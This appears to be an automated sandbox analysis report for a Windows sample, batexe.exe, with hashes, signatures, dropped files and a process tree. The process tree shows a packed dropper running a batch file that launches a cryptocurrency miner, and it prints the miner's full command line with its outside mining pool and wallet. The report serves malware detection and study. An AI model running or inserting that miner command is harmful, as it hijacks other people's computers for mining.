73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
297s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
22/02/2024, 08:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3800	b2e.exe
768	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
768	cpuminer-sse2.exe
768	cpuminer-sse2.exe
768	cpuminer-sse2.exe
768	cpuminer-sse2.exe
768	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3444-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3444 wrote to memory of 3800	3444	batexe.exe	75
PID 3444 wrote to memory of 3800	3444	batexe.exe	75
PID 3444 wrote to memory of 3800	3444	batexe.exe	75
PID 3800 wrote to memory of 3100	3800	b2e.exe	76
PID 3800 wrote to memory of 3100	3800	b2e.exe	76
PID 3800 wrote to memory of 3100	3800	b2e.exe	76
PID 3100 wrote to memory of 768	3100	cmd.exe	79
PID 3100 wrote to memory of 768	3100	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3444
- C:\Users\Admin\AppData\Local\Temp\7ADD.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\7ADD.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7ADD.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7D1F.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3100
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7ADD.tmp\b2e.exe

Filesize
4.6MB

MD5
e3f9ce8f8db18e32f980e1071416f10b

SHA1
4c790d544272e04e13ee263b06334a3fc3346ab8

SHA256
134d938e80312eb906077fc5bd14d8adbdb79ba5e2f8d332ec243c57351f1c94

SHA512
ffbbd5bdf99290b6b949ebe8a5da07294f9990a86f7eddfdc1b9e3c8955702cfbdd140b194c5ee49243ec1fbb0a0ca2a1d52af15129dcfaa243c0e40aafb2ed4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ADD.tmp\b2e.exe

Filesize
4.4MB

MD5
034b7c80de8e383d75bce172333f6b59

SHA1
a10e6ebe4e2927f306fb6c6fd167cf54452674bf

SHA256
5e17cf3a22239a8f1fb8b3b37b6722f705c274a618db2e66dee73ce27836f583

SHA512
694ec9f94beca126c8460c4fc1a6346f495dcfcef83f48a79ddbb1ff10b3ce065515b505382e1b2d26b9a271a3eded2522120c3310235d0e06b89cbc57257408

Download Submit
C:\Users\Admin\AppData\Local\Temp\7D1F.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
993KB

MD5
67a606f7bf07530dec1de88faa724f5b

SHA1
730d8eeaaca473a175f2227c7c64ba40958ae3d4

SHA256
6d4b2e108cebad3edc5a675cf4a9ff3f8872843bc110eff3f5c580c0099bfca9

SHA512
20c5c3a16b980f75fcdd093f6d3aa9b6d2f58270af926fe0a19a3f6708016aa84d8885682bd5ba263723b2b3d08f5a8c0d8b1eca074269056664ef22913af6b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
806KB

MD5
d0e875ea51687f2a10a739305ab23ddf

SHA1
3fea1fb88a1c64edd98576d8665985b0b4f43713

SHA256
04bfe3b82f9d7c9f14805ea50a54acba31ec69a0fbc0816146716e64c3046b5c

SHA512
a22159ed5666acb7da47ef96eed9316377f3ba8f93b8abfdb3b00e0c97509f86d27063a04e8c056cb130405f8486f3749b916806e4b8cb324ae7d1a7dfd1c2bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
623KB

MD5
baca7f2953bf0522b0ee2488bb5ccd03

SHA1
73572f0499b89edab1920bf3f10423dda904cf56

SHA256
42a751f93a84a122148c0e87509ad8e57a4238de4b50ff52d7db98920600ab3e

SHA512
4e0faaddcd5ca5863cc3938eaa2e15d6e42fe678091a0cf1a7fd4a1e3f0aba965b50fa38fb685ca55a217101423b239efc5def67876666e2ea399543eb687d94

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
960KB

MD5
c04202d27a40019b6a699c65c9a0ca4d

SHA1
9af641c8b836c4523ba780e09954369085e73e28

SHA256
e8acfe0c4452c40ff32ba0fa7dac6b8374e9e895be2af35dde5d59e72945a35b

SHA512
79c5716eaad6d216871478ee40adce25a762bffbaf0771a9057cad2e54a4df025035cb7d67f010026eba564790812c4659a261506caf361441d31661cf9aa71a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
734KB

MD5
35d76b05583075c674c01dd18129a1dd

SHA1
65af01afc85503308cff4bec98dca835311b2d4e

SHA256
cb2d70ae4d530a54425c3d6fb489aedd9463194747d04280bc1c8bd7ed6d3a97

SHA512
c270ae18088ee05fa5a4a851bf2a297bab6666ec535bd6e5f97dbbe20f253be3904b7ae2787bb489bd77f110e6362023ac75fc2d15e43f462072118768fe139d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
583KB

MD5
2d3e9fb7f126b12e48a3b68c9276b49b

SHA1
038385cce5da82e81e80016b2ba54c6418ac602d

SHA256
4e187e6bd135ba3fe87efa241bf85f4b6f1e86cd670deb7e5f638660fd39bccd

SHA512
d9d675ca11d96d157d3bfc0121dd041bd2b30885fcfd46cb7909b1c2f7f163fe8267830bb299f5e6ba3d0de931f49deb43a0a9fd520579f72827131a110d0aec

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
523KB

MD5
8ebe75a6e542ab03fc9f35a6eea1b931

SHA1
23f508f27851a2e855238f6a0ecc73f36f338e54

SHA256
104a87c5b659485bb20f5ce2169938a768fa4e2da1d19e224b3cf4f31159d9ca

SHA512
487d73d590e82074a2a247b51eeb4d1847c9f06526fe99f0a58ad631d6f90563e039c065ab4de0e46075bc2b8abb701633ec110a57a939a2218fb09346587c49

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
732KB

MD5
b16456dde467767c6e7ff290a7a40081

SHA1
cd9a981794d5637ff7b2dad2712bf37af34d2dbb

SHA256
2b95d1ac8746156b4c3eae868f58241046153f27ce37425ae0e8fdeb75a4b35f

SHA512
95d53a39adf95df2e3e3d6414fb0b6324903e3c2c3243a128b7314887b161f2f4b3a760a7864dcc267bc1f1dbd41affb2bafe23b60d5b15048d529d266b607b3

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
534KB

MD5
4125163929f8d999fe3fb11d5c2bdb6a

SHA1
12f6de0f25050ee3fba92e21490a43f332cf05d5

SHA256
8e0d99f6478501ba31dde0287d2e2f22e8458b6bb5259c5eabbbce07b9fa2850

SHA512
0999b10da0f4ba2002145973317e1dda0579845a0c0f3b764ce49008cfc215c186c891f609f8f7773cff0235ad9ee4301f2860fda9e91b5ea7ef5f3f46d3e139

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
521KB

MD5
ead61314c2d294c494d2ba6f768cd10a

SHA1
0705ec45d854891eb13789a823f88b80eb6672a2

SHA256
27c024e6d0193d93ef1246851d0cd49a8a9a87a097ec3f1db945c6510fcc6a99

SHA512
d5e62d44c9d5727fa1d3827c505240e20d2831f26549489905355d271eb45c6aae2483355654fc7bb087eeff03b9548e2fa4baeb9764ac348058110e02102ded

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
390KB

MD5
7b022a992f07b0d662b6d84febed5253

SHA1
82ff58f689860933bd74a95ca9b3f08c0bdcebe9

SHA256
eddcc241589b5b288f080ea517341293c773a2fbc01b4bafc25016423084fda2

SHA512
928017cbb9324e7a3ac141276c3bea52594e11a89ad4e09f4a707be7c24edef8880b0a69f9a794509a5fd17111fd8f37a3b2e621365c32b433fc52d8611126b3

Download Submit
memory/768-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/768-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/768-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/768-43-0x0000000069460000-0x00000000694F8000-memory.dmp

Filesize
608KB

Download
memory/768-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/768-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/768-44-0x00000000010C0000-0x0000000002975000-memory.dmp

Filesize
24.7MB

Download
memory/768-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/768-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/768-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/768-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/768-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/768-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/768-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/768-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/768-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3444-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3800-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3800-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download